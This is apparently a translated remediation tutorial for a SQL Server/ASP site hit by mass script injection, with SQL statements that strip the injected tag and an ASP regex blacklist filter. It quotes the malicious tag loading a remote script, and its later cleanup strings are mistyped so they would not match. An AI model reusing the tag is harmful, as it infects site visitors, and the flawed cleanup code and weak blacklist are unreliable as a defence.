First back up the database to avoid unnecessary loss. Then, for every varchar field of less than 8000 characters that had the script injected, run the following:
The code is as follows:
UPDATE [table name] SET [field name] = REPLACE([field name], '<script src=http://c.n%75clear3.com/css/c.js></script>', '')
Here <script src=http://c.n%75clear3.com/css/c.js></script> is the injected script; after the statement runs, the injected field is cleaned. But some fields, such as content fields, are longer than 8000 characters, and for those you need to run the following:
The code is as follows:
UPDATE [table name] SET [field name] = REPLACE(CAST([field name] AS varchar(8000)), '<script src=http:/c.nuclear3.com/css/c.js> </Script>', '')
to update the injected field. Because the real-estate site had a large amount of content, running the statement above made the server appear to hang, so it was split into batches on an id range, processing 15,000 rows per run:
The code is as follows:
UPDATE [table name] SET [field name] = REPLACE(CAST([field name] AS varchar(8000)), '<script src=http:/c.nuclear3.com/css/c.js> </Script>', '') WHERE id > 1 AND id < 15000
The problems above generally occur with SQL Server databases; this is an injection vulnerability specific to that database. Switching databases is not realistic, so the only option is to guard against the situation above. The idea is to filter every request that reaches the database connection.
The code is as follows:
<%
Response.Buffer = True ' cache the page
' Prevent GET injection
If Request.QueryString <> "" Then stopinjection(Request.QueryString)
' Prevent POST injection
If Request.Form <> "" Then stopinjection(Request.Form)
' Prevent cookie injection
If Request.Cookies <> "" Then stopinjection(Request.Cookies)

' Regular-expression check function
Function stopinjection(Values)
    Dim regEx
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists)[\s\b+]*)"
    Dim sItem, sValue
    ' Check every value in the collection; stop the page on the first hit
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "<script language=javascript>alert('Illegal injection! Your action has been recorded!!');history.back(-1);</script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End Function
%>
Make this a generic SQL anti-injection page and include it in the Conn.asp database connection file, so that the whole site is protected against SQL injection attacks. However, front-end URLs such as ?id= may still have injection vulnerabilities, so the values obtained from Request.Form and Request.QueryString must be strictly filtered. Never fetch values with the plain Request("name") form, and try not to use content saved in cookies in SQL statements that query the database.
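To see what the blacklist in stopinjection() actually accepts and rejects, here is a JavaScript port of its pattern run against constructed request values. This is an added example, not code from the original article; VBScript's RegExp object uses the JScript regex engine, so the pattern is carried over unchanged, and the sample requests are invented for a property-listing site.

```javascript
// Added example (not from the original article): JavaScript port of the
// stopinjection() pattern so its behaviour can be checked offline.
const KEYWORDS = "select|update|insert|delete|declare|@|exec|dbcc|alter|drop|" +
  "create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists";

// Inside a character class \b is a backspace character, not a word boundary,
// so [\s\b+()] really means "whitespace, backspace, '+', '(' or ')'".
// IgnoreCase=True maps to the "i" flag; Global=True is deliberately left out,
// because RegExp.prototype.test with "g" keeps lastIndex between calls.
const INJECTION_PATTERN = new RegExp(
  "'|;|#|([\\s\\b+()]+(" + KEYWORDS + ")[\\s\\b+]*)", "i");

// Mirrors the For Each loop over Request.QueryString / Request.Form:
// returns the name of the first field whose value trips the pattern, or null.
function checkRequest(values) {
  for (const [name, value] of Object.entries(values)) {
    if (INJECTION_PATTERN.test(String(value))) return name;
  }
  return null;
}

// Constructed sample requests (not real traffic) for a property-listing site.
const samples = {
  normal:      { id: "42", city: "Shanghai" },              // passes
  tautology:   { id: "1 or 1=1" },                          // blocked by " or"
  apostrophe:  { name: "O'Brien" },                         // blocked by "'" (false positive)
  listingText: { note: "an open house this weekend" },      // blocked by " open" (false positive)
};

// Runs every sample through the check and reports which field (if any) was flagged.
function runSamples() {
  const results = {};
  for (const [label, req] of Object.entries(samples)) {
    results[label] = checkRequest(req);
  }
  return results;
}

console.log(runSamples());
```

The two false positives show why a keyword blacklist like this breaks legitimate input (apostrophes in names, ordinary words such as "open" and "and") while still leaving the ?id= case described above to be handled by proper parameter validation.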
Readers who are unfamiliar with SQL Server can use software to do this instead:
SQL Server database Bulk replacement tool (database and text file lookup replacement) v1.0 Chinese Green Edition
SQL Server database Bulk find substitution tool 1.2 sql Trojan Cleanup assistant